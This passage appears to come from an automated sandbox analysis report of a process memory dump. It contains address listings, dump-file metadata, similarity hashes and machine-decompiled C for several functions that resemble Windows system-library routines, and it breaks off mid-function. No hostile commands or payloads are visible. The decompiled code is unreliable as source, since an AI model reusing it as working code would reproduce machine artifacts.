                                                                                            0x04d47bea
                                                                                            0x04d47a36
                                                                                            0x04d47a43
                                                                                            0x04d47a48
                                                                                            0x04d47a4c
                                                                                            0x04d47a4e
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d47a58
                                                                                            0x04d47a5a
                                                                                            0x04d47a5b
                                                                                            0x04d47a5c
                                                                                            0x04d47a5d
                                                                                            0x04d47a63
                                                                                            0x04d47a64
                                                                                            0x04d47a6a
                                                                                            0x04d47a6c
                                                                                            0x04d47a6e
                                                                                            0x04d479cb
                                                                                            0x04d479cb
                                                                                            0x04d479ce
                                                                                            0x04d479d0
                                                                                            0x04d47a98
                                                                                            0x04d47a9b
                                                                                            0x04d47a9b
                                                                                            0x04d47a9e
                                                                                            0x04d47aa1
                                                                                            0x04d47bbe
                                                                                            0x04d47bbe
                                                                                            0x04d47bc0
                                                                                            0x04d47be0
                                                                                            0x04d47be0
                                                                                            0x04d47a01
                                                                                            0x04d47a01
                                                                                            0x04d47a05
                                                                                            0x04d47a07
                                                                                            0x04d47a15
                                                                                            0x04d47a15
                                                                                            0x04d47a1a
                                                                                            0x00000000
                                                                                            0x04d47a1a
                                                                                            0x04d47bc2
                                                                                            0x04d47bc6
                                                                                            0x04d47bc9
                                                                                            0x04d47bcd
                                                                                            0x04d47bcf
                                                                                            0x04d479e6
                                                                                            0x04d479e6
                                                                                            0x04d479eb
                                                                                            0x04d479eb
                                                                                            0x04d479ef
                                                                                            0x04d479f1
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d479f3
                                                                                            0x04d479f5
                                                                                            0x04d479ff
                                                                                            0x04d479ff
                                                                                            0x00000000
                                                                                            0x04d479ff
                                                                                            0x04d479f7
                                                                                            0x04d479fd
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d479fd
                                                                                            0x04d47bd5
                                                                                            0x04d47bd8
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d47ba9
                                                                                            0x04d47bac
                                                                                            0x04d47bb0
                                                                                            0x04d47bb1
                                                                                            0x04d47bb1
                                                                                            0x04d47bb6
                                                                                            0x00000000
                                                                                            0x04d47bb6
                                                                                            0x04d47aa7
                                                                                            0x04d47aaa
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d47ab2
                                                                                            0x04d47ab3
                                                                                            0x04d47ab5
                                                                                            0x04d47aec
                                                                                            0x04d47aef
                                                                                            0x04d47b25
                                                                                            0x04d47b28
                                                                                            0x04d47b62
                                                                                            0x04d47b64
                                                                                            0x04d47b8f
                                                                                            0x04d47b92
                                                                                            0x04d47b96
                                                                                            0x04d47b98
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d47b9e
                                                                                            0x04d47b9f
                                                                                            0x04d47ba3
                                                                                            0x00000000
                                                                                            0x04d47ba3
                                                                                            0x04d47b66
                                                                                            0x04d47b68
                                                                                            0x04d47ae2
                                                                                            0x04d47ae2
                                                                                            0x00000000
                                                                                            0x04d47ae2
                                                                                            0x04d47b6e
                                                                                            0x04d47b72
                                                                                            0x04d47b75
                                                                                            0x04d47b81
                                                                                            0x04d47b85
                                                                                            0x04d47b87
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d47b31
                                                                                            0x04d47b34
                                                                                            0x04d47b3c
                                                                                            0x04d47b45
                                                                                            0x04d47b46
                                                                                            0x04d47b4f
                                                                                            0x04d47b51
                                                                                            0x04d47b57
                                                                                            0x04d47b59
                                                                                            0x04d47b59
                                                                                            0x00000000
                                                                                            0x04d47b59
                                                                                            0x04d47b77
                                                                                            0x00000000
                                                                                            0x04d47b77
                                                                                            0x04d47b2a
                                                                                            0x00000000
                                                                                            0x04d47b2a
                                                                                            0x04d47af1
                                                                                            0x04d47af3
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d47afb
                                                                                            0x04d47afc
                                                                                            0x04d47afe
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d47b00
                                                                                            0x04d47b03
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d47b05
                                                                                            0x04d47b09
                                                                                            0x04d47b0d
                                                                                            0x04d47b0f
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d47b18
                                                                                            0x04d47b1d
                                                                                            0x00000000
                                                                                            0x04d47b1d
                                                                                            0x04d47ab7
                                                                                            0x04d47ab9
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d47abf
                                                                                            0x04d47ac1
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d47ac3
                                                                                            0x04d47ac6
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d47ac8
                                                                                            0x04d47acc
                                                                                            0x04d47ad0
                                                                                            0x04d47ad2
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d47adb
                                                                                            0x00000000
                                                                                            0x04d47adb
                                                                                            0x04d479d6
                                                                                            0x04d479d9
                                                                                            0x04d479dc
                                                                                            0x04d47a91
                                                                                            0x04d47a94
                                                                                            0x00000000
                                                                                            0x04d47a94
                                                                                            0x04d479e2
                                                                                            0x00000000
                                                                                            0x04d479e2
                                                                                            0x04d47a74
                                                                                            0x04d47a7a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d47a8a
                                                                                            0x04d47a21
                                                                                            0x04d47a21
                                                                                            0x00000000
                                                                                            0x04d47a21
                                                                                            0x04cdc650
                                                                                            0x04cdc651
                                                                                            0x04cdc656
                                                                                            0x04cdc65c
                                                                                            0x04cdc65d
                                                                                            0x04cdc663
                                                                                            0x04cdc664
                                                                                            0x04cdc66a
                                                                                            0x04cdc66e
                                                                                            0x04d479c5
                                                                                            0x04d479c7
                                                                                            0x00000000
                                                                                            0x04d479c7
                                                                                            0x04cdc67a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 287c96aadbec9c5e309a97743688d1efea6d25a1a777283f7845b380acb84b6b
                                                                                            • Instruction ID: eebb3eb9b460feeed02895686420c3c1a2cbfe978f12111b931c297e98afea45
                                                                                            • Opcode Fuzzy Hash: 287c96aadbec9c5e309a97743688d1efea6d25a1a777283f7845b380acb84b6b
                                                                                            • Instruction Fuzzy Hash: D8818D756446429FDB25CE54C881A6BB3A5FFC4354F18486AED899B280E330FE45CBA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D56DC9, Relevance: .2, Instructions: 199COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 79%
                                                                                            			E04D56DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L04CF4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E04D56B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E04CF7D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E04D19AE0();
					_t87 = L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E04D5795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E04D5795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E04D5795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E04D5795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L04CF4620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E04D56B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E04D56B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E04D56B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E04D56B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E04CF7D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E04D19AE0();
								L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L04CF2400( &_v36);
							if(_v24 >= 0) {
								_t87 = L04CF2400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L04CF2400( &_v52);
							}
							if(_v28 >= 0) {
								return L04CF2400( &_v60);
							}
						}
					}
				}
				return _t87;
			}































                                                                                            0x04d56dd4
                                                                                            0x04d56dde
                                                                                            0x04d56de1
                                                                                            0x04d56de3
                                                                                            0x04d56de6
                                                                                            0x04d56de9
                                                                                            0x04d56dec
                                                                                            0x04d56def
                                                                                            0x04d56df2
                                                                                            0x04d56df5
                                                                                            0x04d56dfe
                                                                                            0x04d56e04
                                                                                            0x04d56e09
                                                                                            0x04d56e0d
                                                                                            0x04d56e18
                                                                                            0x04d56e1b
                                                                                            0x04d56e22
                                                                                            0x04d56e2d
                                                                                            0x04d56e30
                                                                                            0x04d56e36
                                                                                            0x04d56e42
                                                                                            0x04d56e4d
                                                                                            0x04d56e50
                                                                                            0x04d56e55
                                                                                            0x04d56e5c
                                                                                            0x04d56e6e
                                                                                            0x04d56e5e
                                                                                            0x04d56e67
                                                                                            0x04d56e67
                                                                                            0x04d56e73
                                                                                            0x04d56e74
                                                                                            0x04d56e77
                                                                                            0x04d56e7c
                                                                                            0x04d56e7d
                                                                                            0x04d56e8e
                                                                                            0x04d56e93
                                                                                            0x04d56e9c
                                                                                            0x04d56ea8
                                                                                            0x04d56eab
                                                                                            0x04d56eac
                                                                                            0x04d56eb3
                                                                                            0x04d56ecd
                                                                                            0x04d56edc
                                                                                            0x04d56ee2
                                                                                            0x04d56ee5
                                                                                            0x04d56ef2
                                                                                            0x04d56efb
                                                                                            0x04d56f01
                                                                                            0x04d56f06
                                                                                            0x04d56f0b
                                                                                            0x04d56f11
                                                                                            0x04d56f1a
                                                                                            0x04d56f22
                                                                                            0x04d56f26
                                                                                            0x04d56f26
                                                                                            0x04d56f33
                                                                                            0x04d56f41
                                                                                            0x04d56f44
                                                                                            0x04d56f47
                                                                                            0x04d56f54
                                                                                            0x04d56f65
                                                                                            0x04d56f77
                                                                                            0x04d56f7c
                                                                                            0x04d56f82
                                                                                            0x04d56f91
                                                                                            0x04d56f99
                                                                                            0x04d56fa3
                                                                                            0x04d56fae
                                                                                            0x04d56fae
                                                                                            0x04d56fba
                                                                                            0x04d56fbb
                                                                                            0x04d56fbc
                                                                                            0x04d56fc1
                                                                                            0x04d56fc2
                                                                                            0x04d56fd3
                                                                                            0x04d56fd8
                                                                                            0x04d56fd8
                                                                                            0x04d56fdf
                                                                                            0x04d56fe8
                                                                                            0x04d56fee
                                                                                            0x04d56fee
                                                                                            0x04d56ff5
                                                                                            0x04d56ffb
                                                                                            0x04d56ffb
                                                                                            0x04d57004
                                                                                            0x00000000
                                                                                            0x04d5700a
                                                                                            0x04d57004
                                                                                            0x04d56eb3
                                                                                            0x04d56e9c
                                                                                            0x04d57015

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                                            • Instruction ID: 3f998f56555ac2de3962bcfa36ac67e271b9158f4210b75e255c5dcde1f09270
                                                                                            • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                                            • Instruction Fuzzy Hash: 6B715F71A00619AFDF11DFA9C944AEEBBB9FF48714F104169E905A7250DB34FA41CBA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D6B8D0, Relevance: .2, Instructions: 199COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 39%
                                                                                            			E04D6B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x4dc7b9c; // 0x0
				_t124 = L04CF4620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E04D19800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E04D195B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E04D195D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L04CF77F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E04D19910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E04D195D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x4dc7b9c; // 0x0
									_t92 = L04CF4620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E04D19910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E04CDA7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E04D6E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E04D6E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E04D195B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}




















                                                                                            0x04d6b8d9
                                                                                            0x04d6b8e4
                                                                                            0x00000000
                                                                                            0x04d6b8e6
                                                                                            0x04d6b8f3
                                                                                            0x04d6b8f5
                                                                                            0x04d6b8f5
                                                                                            0x04d6b8f8
                                                                                            0x04d6b920
                                                                                            0x04d6b924
                                                                                            0x04d6b936
                                                                                            0x04d6b939
                                                                                            0x04d6b93d
                                                                                            0x04d6b948
                                                                                            0x04d6b9a0
                                                                                            0x04d6b9a0
                                                                                            0x04d6b9a4
                                                                                            0x04d6b9bf
                                                                                            0x04d6b9c4
                                                                                            0x04d6b9c6
                                                                                            0x04d6b9cd
                                                                                            0x04d6b9d1
                                                                                            0x04d6bad4
                                                                                            0x04d6bad8
                                                                                            0x04d6bada
                                                                                            0x04d6badc
                                                                                            0x04d6badc
                                                                                            0x04d6badf
                                                                                            0x04d6bae0
                                                                                            0x04d6bae2
                                                                                            0x04d6bae4
                                                                                            0x04d6baec
                                                                                            0x04d6baee
                                                                                            0x04d6baf0
                                                                                            0x04d6baf0
                                                                                            0x04d6baec
                                                                                            0x04d6bafb
                                                                                            0x04d6bafc
                                                                                            0x04d6bafe
                                                                                            0x04d6bb01
                                                                                            0x04d6bb01
                                                                                            0x00000000
                                                                                            0x04d6bb06
                                                                                            0x04d6b9d7
                                                                                            0x04d6b9db
                                                                                            0x04d6b9db
                                                                                            0x04d6b9de
                                                                                            0x04d6b9de
                                                                                            0x04d6b9e4
                                                                                            0x04d6b9e7
                                                                                            0x04d6b9ea
                                                                                            0x04d6b9ec
                                                                                            0x04d6b9ef
                                                                                            0x04d6b9f3
                                                                                            0x04d6ba1b
                                                                                            0x04d6ba1b
                                                                                            0x04d6ba23
                                                                                            0x04d6ba24
                                                                                            0x04d6ba27
                                                                                            0x04d6ba2a
                                                                                            0x04d6ba2b
                                                                                            0x04d6ba2e
                                                                                            0x04d6ba30
                                                                                            0x04d6ba37
                                                                                            0x04d6ba3f
                                                                                            0x04d6ba9c
                                                                                            0x04d6baa2
                                                                                            0x04d6bb13
                                                                                            0x04d6bb15
                                                                                            0x04d6baae
                                                                                            0x04d6baae
                                                                                            0x04d6bab3
                                                                                            0x04d6bab5
                                                                                            0x04d6baba
                                                                                            0x04d6bac8
                                                                                            0x04d6bac8
                                                                                            0x04d6baba
                                                                                            0x04d6bacd
                                                                                            0x04d6bacf
                                                                                            0x00000000
                                                                                            0x04d6bacf
                                                                                            0x04d6bb1a
                                                                                            0x00000000
                                                                                            0x04d6bb1c
                                                                                            0x04d6baa7
                                                                                            0x04d6bb11
                                                                                            0x00000000
                                                                                            0x04d6bb11
                                                                                            0x04d6baa9
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d6ba41
                                                                                            0x04d6ba41
                                                                                            0x04d6ba41
                                                                                            0x04d6ba58
                                                                                            0x04d6ba5d
                                                                                            0x04d6ba62
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d6ba64
                                                                                            0x04d6ba67
                                                                                            0x04d6ba68
                                                                                            0x04d6ba69
                                                                                            0x04d6ba6c
                                                                                            0x04d6ba6f
                                                                                            0x04d6ba71
                                                                                            0x04d6ba78
                                                                                            0x04d6ba80
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d6ba90
                                                                                            0x04d6ba90
                                                                                            0x04d6ba97
                                                                                            0x00000000
                                                                                            0x04d6ba97
                                                                                            0x04d6b9f5
                                                                                            0x04d6b9f7
                                                                                            0x04d6b9f7
                                                                                            0x04d6b9fa
                                                                                            0x04d6ba03
                                                                                            0x04d6ba07
                                                                                            0x04d6ba0c
                                                                                            0x04d6ba10
                                                                                            0x04d6ba17
                                                                                            0x00000000
                                                                                            0x04d6b9f7
                                                                                            0x04d6b9a6
                                                                                            0x04d6b9a8
                                                                                            0x04d6b9af
                                                                                            0x04d6b9b3
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d6b9b9
                                                                                            0x00000000
                                                                                            0x04d6b9b9
                                                                                            0x04d6b94d
                                                                                            0x04d6b98f
                                                                                            0x04d6b995
                                                                                            0x04d6b999
                                                                                            0x04d6b960
                                                                                            0x04d6b967
                                                                                            0x04d6b968
                                                                                            0x04d6b96a
                                                                                            0x00000000
                                                                                            0x04d6b96a
                                                                                            0x04d6b99b
                                                                                            0x04d6b99e
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d6b99e
                                                                                            0x04d6b951
                                                                                            0x04d6b954
                                                                                            0x04d6b95a
                                                                                            0x04d6b95e
                                                                                            0x04d6b972
                                                                                            0x04d6b979
                                                                                            0x04d6b97d
                                                                                            0x04d6b97f
                                                                                            0x04d6b980
                                                                                            0x04d6b982
                                                                                            0x04d6b984
                                                                                            0x00000000
                                                                                            0x04d6b984
                                                                                            0x00000000
                                                                                            0x04d6b926
                                                                                            0x00000000
                                                                                            0x04d6b926

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b53321afffeb22c92a70e848d1a80ac9018a2c507f2b88f451c08cb1f6a6ab13
                                                                                            • Instruction ID: edd8e428949533581fb68735c8b27da06674c6a7e79d0a441d6a216279e8faaa
                                                                                            • Opcode Fuzzy Hash: b53321afffeb22c92a70e848d1a80ac9018a2c507f2b88f451c08cb1f6a6ab13
                                                                                            • Instruction Fuzzy Hash: 17710F72200B11AFE7329F18C854F66BBA6FB40724F14452AE656C72A0EBB4F944DB50
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04CD52A5, Relevance: .2, Instructions: 161COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 80%
                                                                                            			E04CD52A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E04CEEEF0(0x4dc79a0);
					_t104 =  *0x4dc8210; // 0xd02ba0
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					_t2 = _t104 + 8; // 0x28000000
					 *((intOrPtr*)(_t108 + 0x18)) =  *_t2;
					E04CEEB70(_t93, 0x4dc79a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_t10 = _t104 + 4; // 0x0
							_push( *_t10);
							_t53 = E04D19890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E04CEEEF0(0x4dc79a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E04CEEB70(0, 0x4dc79a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t11 = _t104 + 0xe; // 0xd02bb802
								_t13 = _t104 + 0xc; // 0xd02bad
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E04D0F0BF(_t13,  *_t11 & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E04CEEEF0(0x4dc79a0);
									__eflags =  *0x4dc8210 - _t104; // 0xd02ba0
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x4dc8210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t37 = _t104 + 0x10; // 0x2000d02b
											_t95 =  *((intOrPtr*)( *_t37));
											E04D54888(_t89,  *((intOrPtr*)( *_t37)), __eflags);
										}
										E04CEEB70(_t95, 0x4dc79a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_t38 = _t104 + 4; // 0x0
											_push( *_t38);
											E04D195D0();
											L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_t41 = _t104 + 4; // 0x0
											_push( *_t41);
											E04D195D0();
											L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E04CEEB70(_t93, 0x4dc79a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_t25 = _t104 + 4; // 0x0
										_push( *_t25);
										E04D195D0();
										L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
